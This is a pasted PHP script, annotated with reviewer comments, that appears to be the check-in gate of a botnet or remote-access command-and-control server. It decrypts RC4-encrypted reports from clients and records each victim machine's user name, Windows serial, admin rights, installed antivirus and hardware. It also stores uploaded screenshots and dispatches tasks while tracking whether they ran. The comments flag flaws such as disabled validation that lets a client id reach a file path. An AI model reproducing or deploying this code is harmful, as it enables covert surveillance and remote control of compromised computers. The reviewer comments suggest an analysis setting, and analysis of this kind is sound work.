
Untitled

a guest
Sep 25th, 2017
  1. <?php
  2. include_once("gdx/gdx.php");
  3. include_once("gdx/internal.php");
  4. include_once("gdx/utility.php");
  5.  
  /**
   * Shape check for a decoded client check-in: requires 35 short field names
   * to be present, then tests their formats (hex id, numeric, printable, word
   * characters only).
   *
   * The column each field is stored under is visible in the INSERT statement
   * later in this file (e.g. "cvr" -> Version, "har" -> HasAdminRigths,
   * "fip" -> FilePath, "avs" -> Antivirus).
   *
   * NOTE(review): the only call visible in this file, in the client-notify
   * branch, is commented out, so this function is not applied to incoming data
   * there.
   *
   * @param array $POST Field array to check (the caller passes the array that
   *                    parse_str() filled from the request body).
   * @return bool true when the format condition below evaluates to true,
   *              false otherwise.
   */
  function IsValidPOST($POST)
  {
      // Presence check: every one of the 35 keys must be set, otherwise reject.
      if (!(
          isset($POST["cid"]) &&
          isset($POST["cvr"]) &&
          isset($POST["har"]) &&
          isset($POST["fip"]) &&
          isset($POST["wiv"]) &&
          isset($POST["osa"]) &&
          isset($POST["wsp"]) &&
          isset($POST["wed"]) &&
          isset($POST["wbi"]) &&
          isset($POST["wlg"]) &&
          isset($POST["wsr"]) &&
          isset($POST["wdr"]) &&
          isset($POST["pcn"]) &&
          isset($POST["usn"]) &&
          isset($POST["ltm"]) &&
          isset($POST["cmd"]) &&
          isset($POST["ctp"]) &&
          isset($POST["bio"]) &&
          isset($POST["bmn"]) &&
          isset($POST["bvs"]) &&
          isset($POST["bsn"]) &&
          isset($POST["cpu"]) &&
          isset($POST["cmn"]) &&
          isset($POST["car"]) &&
          isset($POST["npr"]) &&
          isset($POST["vda"]) &&
          isset($POST["vrs"]) &&
          isset($POST["vrr"]) &&
          isset($POST["hds"]) &&
          isset($POST["pms"]) &&
          isset($POST["dbw"]) &&
          isset($POST["alb"]) &&
          isset($POST["anf"]) &&
          isset($POST["jvm"]) &&
          isset($POST["avs"])
      ))
      {
          return false;
      }

      // Format check.
      // NOTE(review): `&&` binds tighter than `||`, and the two `== 1 || == 0`
      // tests are not parenthesised, so this is evaluated as three alternatives:
      //   (cid is 32 hex chars && cvr numeric && har == 1)
      //   || (har == 0 && wiv numeric && osa == 1)
      //   || (osa == 0 && every remaining check)
      // The function can therefore return true without the later field checks
      // having run.
      // NOTE(review): "fip" is required above but has no format test here.
      // NOTE(review): the `== 1` / `== 0` tests are loose comparisons; how a
      // non-numeric string compares with 0 differs between PHP 7 and PHP 8.
      if( (strlen($POST["cid"]) == 32 && ctype_xdigit($POST["cid"])) &&
          is_numeric($POST["cvr"]) &&
          $POST["har"] == 1 || $POST["har"] == 0 &&
          is_numeric($POST["wiv"]) &&
          $POST["osa"] == 1 || $POST["osa"] == 0 &&
          is_numeric($POST["wsp"]) &&
          is_numeric($POST["wed"]) &&
          is_numeric($POST["wbi"]) &&
          is_numeric($POST["wlg"]) &&
          ctype_print($POST["wsr"]) &&
          ctype_print($POST["wdr"]) &&
          !preg_match("/\W/", $POST["pcn"]) &&
          !preg_match("/\W/", $POST["usn"]) &&
          is_numeric($POST["ltm"]) &&
          ctype_print($POST["cmd"]) &&
          is_numeric($POST["ctp"]) &&
          ctype_print($POST["bio"]) &&
          ctype_print($POST["bmn"]) &&
          ctype_print($POST["bvs"]) &&
          ctype_print($POST["bsn"]) &&
          ctype_print($POST["cpu"]) &&
          ctype_print($POST["cmn"]) &&
          is_numeric($POST["car"]) &&
          is_numeric($POST["npr"]) &&
          ctype_print($POST["vda"]) &&
          ctype_print($POST["vrs"]) &&
          ctype_print($POST["vrr"]) &&
          ctype_print($POST["hds"]) &&
          ctype_print($POST["pms"]) &&
          ctype_print($POST["dbw"]) &&
          ctype_print($POST["alb"]) &&
          ctype_print($POST["anf"]) &&
          ctype_print($POST["jvm"]) &&
          ctype_print($POST["avs"])
      )
      {
          return true;
      }

      return false;
  }
  90.  
  // Request handler (analyst summary of what the visible code does):
  //   1. accepts only POST requests that carry a CONTENT_LENGTH,
  //   2. passes the raw body through RC4() with a key read from the Settings
  //      table and parses the result as URL-encoded form fields,
  //   3. dispatches on the "hdr" field: a client check-in (host inventory,
  //      optional hex-encoded image) or a task result report,
  //   4. echoes whatever LookupTask() returned for a check-in.
  // RC4(), GetIPAddress(), the GDX class, $GdxCurrentTime and the upper-case
  // constants are not defined in this file; presumably they come from the
  // gdx/*.php includes.

  // Any other method, or a request without CONTENT_LENGTH, ends here with an
  // empty response.
  if($_SERVER["REQUEST_METHOD"] !== "POST" || !isset($_SERVER["CONTENT_LENGTH"])) die();

  try
  {

      $Host = MYSQL_HOST;
      $Database = DATABASE_NAME;
      $conn = new PDO("mysql:host=$Host;dbname=$Database", MYSQL_USER, MYSQL_PASSWORD);
      // Database errors are raised as PDOException from here on (see the catch below).
      $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
      // Only the first row of Settings is read; its "Key2" column is used below.
      $QrSett = $conn->query("SELECT * FROM Settings");
      $Sett = $QrSett->fetch(PDO::FETCH_ASSOC);

      // Discard whatever PHP parsed into $_POST and rebuild it from the raw body.
      $_POST = array();
      // CONTENT_LENGTH is a client-supplied header value; it is passed to RC4()
      // as the length argument.
      $ContentLength = $_SERVER["CONTENT_LENGTH"];
      // Presumably RC4-decrypts the body with Settings.Key2 (helper not shown).
      $Data = RC4($Sett["Key2"], KEY_SIZE, file_get_contents("php://input"), $ContentLength);
      parse_str($Data, $_POST);

      // NOTE(review): the second and third tests compare the boolean returned by
      // isset() with the header constants, not the value of $_POST["hdr"]. Once
      // "hdr" is set, isset() is true, so whether this ever rejects a request
      // depends only on the constants' values (not shown). The value itself is
      // effectively checked by the if / else if dispatch below.
      if (!isset($_POST["hdr"]) || (isset($_POST["hdr"]) != HEADER_CLIENT_NOTIFY
      && isset($_POST["hdr"]) != HEADER_TASK_RESULT))
      {
          die();
      }

      $Result = "";
      $gdx = new GDX($conn);
      // Defined elsewhere; runs on every accepted request before dispatch.
      $gdx->UpdateTasksExp();

      // --- Client check-in ---------------------------------------------------
      if($_POST["hdr"] == HEADER_CLIENT_NOTIFY)
      {
          // NOTE(review): the validation call is commented out, so the bare block
          // below runs for every check-in and the fields are used as received.
          //if(IsValidPOST($_POST))
          {
              $ClientId = $_POST["cid"];
              // Hex string -> binary; this binary form is the key used in the Clients table.
              $ClientIdBin = pack('H*', $ClientId);
              $SzIPAddress = GetIPAddress();
              $IPAddress = inet_pton($SzIPAddress);
              $Location = $gdx->GetIPLocation($SzIPAddress);

              // Is this client already registered?
              $SlPr = $conn->prepare("SELECT Id FROM Clients WHERE ClientId = ?");
              $SlPr->execute(array($ClientIdBin));
              $ClientIdAssoc = $SlPr->fetch(PDO::FETCH_ASSOC);

              if(!$ClientIdAssoc)
              {
                  // First contact: insert a new row. All values are bound as named
                  // parameters, not concatenated into the SQL text.
                  $sql = "INSERT INTO Clients (
  ClientId , Version , IPAddress , Location , HasAdminRigths , FilePath ,
  InstallationDate , LastCheck , OperatingSystem , OSArchitecture , ServipackVersion ,
  WindowsEdition , WindowsBuildId , WindowsLang , WindowsSerial , WindowsDir ,
  PCName , UserName , PCLocalTime , ComputerModel , ComputerType ,
  BIOSName , BIOSManufacturer , BIOSVersion , BIOSSerialNumber ,
  CPUName , CPUManufacturer , CPUArquitecture, CPUNumberProcessors ,
  VideoAdapter , VideoResolution , VideoRefreshRate ,
  HardDrives , PhysicalMemories , DefaultBrowser , InstalledBrowsers ,
  InstalledNETFrameworks , JAVAVM , Antivirus )
  VALUES (:ClientId , :Version , :IPAddress , :Location , :HasAdminRigths , :FilePath ,
  :InstallationDate , :LastCheck , :OperatingSystem , :OSArchitecture , :ServipackVersion ,
  :WindowsEdition , :WindowsBuildId , :WindowsLang , :WindowsSerial , :WindowsDir ,
  :PCName , :UserName , :PCLocalTime , :ComputerModel , :ComputerType ,
  :BIOSName , :BIOSManufacturer , :BIOSVersion , :BIOSSerialNumber ,
  :CPUName , :CPUManufacturer , :CPUArquitecture , :CPUNumberProcessors ,
  :VideoAdapter , :VideoResolution , :VideoRefreshRate ,
  :HardDrives , :PhysicalMemories , :DefaultBrowser , :InstalledBrowsers ,
  :InstalledNETFrameworks , :JAVAVM , :Antivirus )";

                  $InPr = $conn->prepare($sql);

                  // $GdxCurrentTime is not assigned in this file; it is used for both
                  // InstallationDate and LastCheck on insert.
                  $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
                  ":IPAddress" => $IPAddress, ":Location" => $Location,
                  ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
                  ":InstallationDate" => $GdxCurrentTime, ":LastCheck" => $GdxCurrentTime,
                  ":OperatingSystem" => $_POST["wiv"], ":OSArchitecture" => $_POST["osa"],
                  ":ServipackVersion" => $_POST["wsp"], ":WindowsEdition" => $_POST["wed"],
                  ":WindowsBuildId" => $_POST["wbi"], ":WindowsLang" => $_POST["wlg"],
                  ":WindowsSerial" => $_POST["wsr"], ":WindowsDir" => $_POST["wdr"],
                  ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
                  ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
                  ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
                  ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
                  ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
                  ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
                  ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
                  ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
                  ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
                  ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
                  ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
                  ":Antivirus" => $_POST["avs"]
                  ));
              }
              else
              {
                  // Known client: refresh every column except InstallationDate.
                  $sql = "UPDATE Clients SET
  ClientId = :ClientId, Version = :Version, IPAddress = :IPAddress,
  Location = :Location, HasAdminRigths = :HasAdminRigths, FilePath = :FilePath,
  LastCheck = :LastCheck, OperatingSystem = :OperatingSystem,
  OSArchitecture = :OSArchitecture, ServipackVersion = :ServipackVersion,
  WindowsEdition = :WindowsEdition, WindowsBuildId = :WindowsBuildId,
  WindowsLang = :WindowsLang, WindowsSerial = :WindowsSerial, WindowsDir = :WindowsDir,
  PCName = :PCName, UserName = :UserName, PCLocalTime = :PCLocalTime,
  ComputerModel = :ComputerModel, ComputerType = :ComputerType,
  BIOSName = :BIOSName, BIOSManufacturer = :BIOSManufacturer, BIOSVersion = :BIOSVersion,
  BIOSSerialNumber = :BIOSSerialNumber, CPUName = :CPUName,
  CPUManufacturer = :CPUManufacturer, CPUArquitecture = :CPUArquitecture,
  CPUNumberProcessors = :CPUNumberProcessors,
  VideoAdapter = :VideoAdapter, VideoResolution = :VideoResolution,
  VideoRefreshRate = :VideoRefreshRate, HardDrives = :HardDrives,
  PhysicalMemories = :PhysicalMemories, DefaultBrowser = :DefaultBrowser,
  InstalledBrowsers = :InstalledBrowsers,
  InstalledNETFrameworks = :InstalledNETFrameworks, JAVAVM = :JAVAVM,
  Antivirus = :Antivirus WHERE Id = :Id";

                  $InPr = $conn->prepare($sql);

                  $Id = $ClientIdAssoc["Id"];
                  $InPr->execute(array(":ClientId" => $ClientIdBin, ":Version" => $_POST["cvr"],
                  ":IPAddress" => $IPAddress, ":Location" => $Location,
                  ":HasAdminRigths" => $_POST["har"], ":FilePath" => $_POST["fip"],
                  ":LastCheck" => $GdxCurrentTime, ":OperatingSystem" => $_POST["wiv"],
                  ":OSArchitecture" => $_POST["osa"], ":ServipackVersion" => $_POST["wsp"],
                  ":WindowsEdition" => $_POST["wed"], ":WindowsBuildId" => $_POST["wbi"],
                  ":WindowsLang" => $_POST["wlg"], ":WindowsSerial" => $_POST["wsr"],
                  ":WindowsDir" => $_POST["wdr"], ":PCName" => $_POST["pcn"], ":UserName" => $_POST["usn"],
                  ":PCLocalTime" => $_POST["ltm"], ":ComputerModel" => $_POST["cmd"],
                  ":ComputerType" => $_POST["ctp"], ":BIOSName" => $_POST["bio"],
                  ":BIOSManufacturer" => $_POST["bmn"], ":BIOSVersion" => $_POST["bvs"],
                  ":BIOSSerialNumber" => $_POST["bsn"], ":CPUName" => $_POST["cpu"],
                  ":CPUManufacturer" => $_POST["cmn"], ":CPUArquitecture" => $_POST["car"],
                  ":CPUNumberProcessors" => $_POST["npr"], ":VideoAdapter" => $_POST["vda"],
                  ":VideoResolution" => $_POST["vrs"], ":VideoRefreshRate" => $_POST["vrr"],
                  ":HardDrives" => $_POST["hds"], ":PhysicalMemories" => $_POST["pms"],
                  ":DefaultBrowser" => $_POST["dbw"], ":InstalledBrowsers" => $_POST["alb"],
                  ":InstalledNETFrameworks" => $_POST["anf"], ":JAVAVM" => $_POST["jvm"],
                  ":Antivirus" => $_POST["avs"], ":Id" => $Id
                  ));
              }

              // Optional "src" field: hex-encoded bytes written to
              // screenshots/<cid>.jpeg.
              if(isset($_POST["src"])) {
                  $ImgBytes = pack('H*', $_POST["src"]);
                  $flag = 0;
                  // NOTE(review): exif_imagetype() takes a file name. It is given the
                  // client id string here, not $ImgBytes, so the uploaded bytes are never
                  // inspected. When no such file can be read the call returns false, which
                  // is != IMAGETYPE_JPEG, so $flag becomes 1 and the write below is skipped.
                  if(exif_imagetype($ClientId) != IMAGETYPE_JPEG){
                      $flag = 1;
                  }
                  // The directory is made world-writable (0777) for the duration of the
                  // write and set back to 0755 afterwards.
                  if(chmod("screenshots", 0777) && $flag==0)
                  {
                      // NOTE(review): $ClientId is concatenated into the path as received;
                      // with the IsValidPOST() call disabled above, nothing in this branch
                      // checks its length or character set first.
                      $Image = fopen("screenshots/" . $ClientId . ".jpeg", "w");
                      if($Image) {
                          fwrite($Image, $ImgBytes);
                          fclose($Image);
                      }
                      chmod("screenshots", 0755);
                  }
              }

              // Whatever LookupTask() returns becomes the response body (echoed at the
              // end of the script). Its format is defined elsewhere.
              $Result = $gdx->LookupTask($conn, $ClientId);
          }
      }
      // --- Task result report ------------------------------------------------
      else if($_POST["hdr"] == HEADER_TASK_RESULT)
      {
          // Unlike the check-in branch, this one validates its inputs: "tid" and
          // "cid" must be 32 hex characters and "trs" must be "1" or "0".
          if (isset($_POST["tid"]) &&
          isset($_POST["cid"]) &&
          isset($_POST["trs"]) &&
          strlen($_POST["tid"]) == 32 && ctype_xdigit($_POST["tid"]) &&
          strlen($_POST["cid"]) == 32 && ctype_xdigit($_POST["cid"]) &&
          (is_numeric($_POST["trs"]) && ($_POST["trs"] == "1" || $_POST["trs"] == "0"))
          )
          {
              $TaskIdBin = pack('H*', $_POST["tid"]);
              $ClientIdBin = pack('H*', $_POST["cid"]);
              $Status = $_POST["trs"];

              $sql = "SELECT Status FROM TasksCompleted WHERE TaskId = :TaskId AND ClientId = :ClientId";
              $SlPr = $conn->prepare($sql);
              $SlPr->execute(array("TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));
              // NOTE(review): fetch() returns false when no row matches; the array
              // access on the next line is not guarded against that.
              $TaskStatus = $SlPr->fetch(PDO::FETCH_ASSOC);

              // Only a task currently in the "sent" state is updated.
              if($TaskStatus["Status"] == TASK_CMPLD_SENT)
              {
                  // "1" -> executed, "0" -> failed.
                  $Status = ($Status) ? TASK_CMPLD_EXECUTED : TASK_CMPLD_FAILED;

                  $sql = "UPDATE TasksCompleted SET Status = :Status WHERE TaskId = :TaskId AND ClientId = :ClientId";
                  $SlPr = $conn->prepare($sql);
                  $SlPr->execute(array("Status" => $Status, "TaskId" => $TaskIdBin, "ClientId" => $ClientIdBin));

                  // Bump the per-task counter that matches the outcome.
                  if($Status == TASK_CMPLD_EXECUTED) {
                      $sql = "UPDATE Tasks SET ClientsExecuted = ClientsExecuted + 1 WHERE TaskId = :TaskId";
                      $SlPr = $conn->prepare($sql);
                      $SlPr->execute(array("TaskId" => $TaskIdBin));
                  }
                  else {
                      // NOTE(review): this statement says `TaskId = TaskId` (no ":"), which
                      // compares the column with itself rather than with the bound value,
                      // while execute() still passes a "TaskId" parameter that the statement
                      // does not declare. With ERRMODE_EXCEPTION that mismatch presumably
                      // surfaces as a PDOException; confirm against the driver in use.
                      $sql = "UPDATE Tasks SET ClientsFailed = ClientsFailed + 1 WHERE TaskId = TaskId";
                      $SlPr = $conn->prepare($sql);
                      $SlPr->execute(array("TaskId" => $TaskIdBin));
                  }
              }
          }
      }

      $conn = null;
  } catch(PDOException $e) {
      // NOTE(review): the raw PDO error text is sent back to the requester.
      echo $e->getMessage();
  }

  // NOTE(review): $Result is first assigned inside the try block; if an
  // exception is thrown before that assignment it is undefined here.
  echo $Result;
  292. ?>